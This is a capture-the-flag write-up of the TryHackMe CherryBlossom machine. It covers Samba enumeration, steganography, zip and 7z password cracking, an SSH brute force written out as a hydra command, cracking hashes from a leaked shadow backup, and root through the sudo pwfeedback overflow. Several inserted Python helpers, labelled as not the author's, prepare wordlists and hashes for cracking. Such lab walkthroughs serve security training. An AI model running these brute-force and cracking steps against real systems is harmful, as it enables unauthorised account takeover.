Tryhackme CherryBlossom Writeup

Akshay Shinde
5 min read, Nov 23, 2020

Write-up by Akshay Shinde

CherryBlossom is a boot2root machine on TryHackMe, a great platform for anyone who wants to improve their CTF skills.

Difficulty: Hard


This machine asks for three flags: the journal flag, the user flag and the root flag. Let's start by scanning the machine for open ports.

Nmap scan

The scan shows three open ports. SSH does not need any further enumeration for now. The Samba shares are the interesting part, and enum4linux is the tool for enumerating them.

enum4linux

enum4linux returns a lot of information about the shares and the local users on the machine. The two pieces that matter later are the user names and the share listing.

Samba listings (this will be helpful later)

There is an Anonymous File Server share, so it is worth looking inside it. smbclient lists and accesses the shares; since the share is anonymous, a null session is enough to connect.

The share contains journal.txt. Opening it shows that the file is not prose at all but a base64-encoded image. Any online decoder would do, but the command line is simpler: decode the text and write the result to a file, then check its type.

With the image recovered, the next step is steganography. The room hint points at DominicBreuker's stego toolkit; stegpy is the tool that extracts the hidden contents from this image.

stegpy extracts a .zip file from the image, but the data is reported as a JPEG: its first bytes have been replaced with a JPEG marker so that the archive does not look like one. To turn it back into a zip we have to restore the ZIP local-file header, 50 4B 03 04 (the ASCII "PK" signature followed by 03 04), in the first four bytes.

After patching the header, the file is recognised as the zip archive we were after.
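The two byte-level steps above (decoding the base64 blob and restoring the zip signature) are easy to get subtly wrong with a hex editor, so here is an added example that does both and verifies the result, with `zipfile` refusing the archive until the signature is back. It is not the author's code, and the stegpy extraction in between is not reproduced: the sample input is a constructed zip whose first four bytes were clobbered with a JPEG marker and then base64-encoded, standing in for the extracted payload; the member name Journal.ctz is an assumption.

```python
import base64
import io
import zipfile

# Leading magic bytes for the containers encountered on this box.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"PK\x03\x04": "zip",
    b"7z\xbc\xaf\x27\x1c": "7z",
}
ZIP_LOCAL_HEADER = b"PK\x03\x04"  # 50 4B 03 04


def identify(data: bytes) -> str:
    """Name the container from its leading bytes, the way `file` does; 'unknown' if none match."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def decode_journal(text: str) -> bytes:
    """Decode a base64 text blob such as journal.txt, tolerating line wrapping."""
    return base64.b64decode("".join(text.split()), validate=True)


def patch_zip_header(data: bytes) -> bytes:
    """Overwrite the first four bytes with the ZIP local-file header (50 4B 03 04).

    Only the signature is replaced; the rest of the local header and the central
    directory are left untouched, which is all the hand edit on the page did.
    """
    if len(data) < len(ZIP_LOCAL_HEADER):
        raise ValueError("payload too short to carry a header")
    if data.startswith(ZIP_LOCAL_HEADER):
        return data  # already a zip, nothing to fix
    return ZIP_LOCAL_HEADER + data[len(ZIP_LOCAL_HEADER):]


def read_zip_members(data: bytes) -> dict:
    """Parse data as a zip and read every member.

    zipfile finds the central directory at the end of the file, so listing works
    even with a broken signature; reading a member re-checks the local header and
    raises zipfile.BadZipFile, which is exactly the broken state before the patch.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def is_readable_zip(data: bytes) -> bool:
    """True if every member can be read, False if the archive is damaged."""
    try:
        read_zip_members(data)
        return True
    except zipfile.BadZipFile:
        return False


def build_sample_journal() -> str:
    """Constructed stand-in for the stegpy output: a real zip whose first four bytes
    were clobbered with a JPEG SOI/APP0 marker, then base64-encoded like journal.txt.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Journal.ctz", b"placeholder bytes, not a real 7z archive")
    disguised = b"\xff\xd8\xff\xe0" + buf.getvalue()[4:]
    return base64.b64encode(disguised).decode()


def recover(journal_text: str):
    """Full chain: base64 -> identify -> patch header -> list the zip members."""
    raw = decode_journal(journal_text)
    fixed = patch_zip_header(raw)
    return identify(raw), identify(fixed), sorted(read_zip_members(fixed))


if __name__ == "__main__":
    print(recover(build_sample_journal()))
```

The `is_readable_zip` check is the one worth keeping: a listing alone can succeed on a damaged archive, so always try to read a member before deciding the header fix worked.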

The zip file is password protected. fcrackzip, a dictionary cracker for zip archives, recovers the password.

Here we go again: the file extracted from _journal.zip is itself a password-protected 7-Zip archive. fcrackzip cannot help with that one, so we convert the archive to a hash with 7z2john.pl and crack it with john. Follow me 😧

Password cracked for Journal.ctz

Journal.ctz is a compressed CherryTree document; unpacking it gives Journal.ctd, which CherryTree opens. CherryTree can be installed with: sudo apt-get install cherrytree

The diary entries are about custom passwords: the user has built a custom password list, and his girlfriend's name is lily. We enumerated the users on this machine earlier, and lily was one of them.

So we can brute force the SSH login for lily with hydra. The word list is the one in the diary itself; export it from CherryTree (or pull the lines straight out of the .ctd, which is plain XML) and feed it to hydra.
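Rather than copying the list out of the CherryTree GUI by hand, the candidates can be pulled straight from Journal.ctd, since a .ctd document is XML. The following is an added example, not the author's code: it assumes the usual CherryTree layout of a `<cherrytree>` root with nested `<node name="...">` elements that hold `<rich_text>` runs, and the embedded document is a constructed stand-in, not the real diary's contents. Lines containing whitespace are treated as diary prose rather than passwords.

```python
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Constructed stand-in for Journal.ctd; the real diary text is not reproduced here.
SAMPLE_CTD = """<?xml version="1.0" ?>
<cherrytree>
  <node name="Diary" unique_id="1">
    <rich_text>Started using custom passwords again, lily says I reuse too much.</rich_text>
    <node name="Password list" unique_id="2">
      <rich_text>lily1234
Lily!2019
cherry-blossom

L1ly_4ever
lily1234
</rich_text>
    </node>
  </node>
</cherrytree>
"""


def node_lines(node: ET.Element) -> list[str]:
    """All text lines held directly by one node's <rich_text> runs (children excluded)."""
    lines = []
    for run in node.findall("rich_text"):
        lines.extend((run.text or "").splitlines())
    return lines


def extract_wordlist(ctd_xml: str, node_name: Optional[str] = None) -> list[str]:
    """Collect candidate passwords from a .ctd document, in document order, deduplicated.

    node_name restricts the search to one page of the diary (the password list);
    with None every node is scanned. Lines with whitespace are prose and dropped.
    """
    root = ET.fromstring(ctd_xml)
    seen, words = set(), []
    for node in root.iter("node"):  # iter() walks nested nodes too
        if node_name is not None and node.get("name") != node_name:
            continue
        for line in node_lines(node):
            word = line.strip()
            if not word or re.search(r"\s", word) or word in seen:
                continue
            seen.add(word)
            words.append(word)
    return words


def write_wordlist(words: list[str], path: str) -> int:
    """Write one candidate per line for hydra/john; returns the number written."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    print(extract_wordlist(SAMPLE_CTD, node_name="Password list"))
```

With the list written out, the SSH attack is hydra -l lily -P wordlist.txt -t 4 ssh://<target-ip>; keep the task count low, since SSH daemons rate-limit and drop noisy connections.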

Now that we have lily's password, let's log in via SSH.

Okay, we are in. The next step is to become johan. Enumerating the box turns up a shadow.bak backup that still contains the password hashes. Cool 🚀

shadow.bak

johan's hash cracks with the same cherry-blossom word list from the diary.
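Before throwing the word list at shadow.bak it pays to know what is actually in it: which accounts are locked (a leading * or !), and which crypt(3) scheme each remaining hash uses, because that decides the john format and the hashcat -m mode. The following is an added example, not the author's code; the shadow file is constructed, and johan's hash is a placeholder with the right shape for $6$ (16-character salt, 86-character digest), not a real digest.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed stand-in for shadow.bak; the johan line is shaped like sha512crypt
# but is not a real hash.
SAMPLE_SHADOW = """root:*:18500:0:99999:7:::
daemon:*:18500:0:99999:7:::
johan:$6$abcdefghijklmnop$QWERTYUIOPASDFGHJKLZXCVBNM0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX:18500:0:99999:7:::
lily:!:18500:0:99999:7:::
"""

# crypt(3) scheme id -> (name, hashcat -m mode). yescrypt has no hashcat mode.
SCHEMES = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
    "y": ("yescrypt", None),
}


@dataclass
class ShadowEntry:
    user: str
    hash_field: str
    scheme: Optional[str]        # None when the account is locked or has no password
    hashcat_mode: Optional[int]  # None when hashcat has no mode for the scheme


def classify(hash_field: str):
    """Return (scheme name, hashcat mode), or (None, None) for locked/disabled fields."""
    if not hash_field or hash_field[0] in "*!":
        return None, None
    parts = hash_field.split("$")  # "$6$salt$digest" -> ["", "6", "salt", "digest"]
    if len(parts) < 4 or parts[0] != "":
        return None, None
    return SCHEMES.get(parts[1], ("unknown", None))


def parse_shadow(text: str) -> list[ShadowEntry]:
    """Parse shadow-format lines (user:hash:lastchg:min:max:warn:inactive:expire:)."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        scheme, mode = classify(fields[1])
        entries.append(ShadowEntry(fields[0], fields[1], scheme, mode))
    return entries


def crackable(entries: list[ShadowEntry]) -> list[ShadowEntry]:
    """Only entries that carry a real hash are worth feeding to a cracker."""
    return [e for e in entries if e.scheme]


def to_john(entries: list[ShadowEntry]) -> str:
    """user:hash lines; john reads these directly with --wordlist."""
    return "".join(f"{e.user}:{e.hash_field}\n" for e in crackable(entries))


def to_hashcat(entries: list[ShadowEntry]) -> dict:
    """Group bare hashes by hashcat mode, one input file per mode."""
    grouped = {}
    for e in crackable(entries):
        if e.hashcat_mode is not None:
            grouped.setdefault(e.hashcat_mode, []).append(e.hash_field)
    return grouped


if __name__ == "__main__":
    print(to_john(parse_shadow(SAMPLE_SHADOW)), end="")
```

For a single sha512crypt hash, john --wordlist=cherry-blossom.txt hashes.txt or hashcat -m 1800 hashes.txt cherry-blossom.txt both work; john's --rules switch is worth adding if the plain list misses, since diary passwords tend to be small variations of each other.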

Privilege Escalation: Exploiting the Sudo Buffer Overflow

Something odd happens when typing the password at the sudo -l prompt: with pwfeedback enabled, sudo echoes an asterisk for every character. I had completed the TryHackMe room that covers this vulnerability, Sudo Buffer Overflow (the pwfeedback overflow, CVE-2019-18634, which affects sudo before 1.8.26 when pwfeedback is set in sudoers); do check it out. Confirm the target is in range with sudo --version before spending time on the exploit.

The exploit is a small C program, exploit.c, but the target has no gcc. Instead we compile it on the attacker machine and copy the binary over. Build it statically (gcc -static) so it does not depend on the victim's glibc version, then transfer it, for example by serving it with python3 -m http.server on the attacker side and fetching it with wget on the victim.

Rooted

Thank you 😸 Happy Hacking 💻 🚀


Akshay Shinde

Security Research @AppKnox | CEH(P) | CRTP | eCPPTv2 | RASTALABS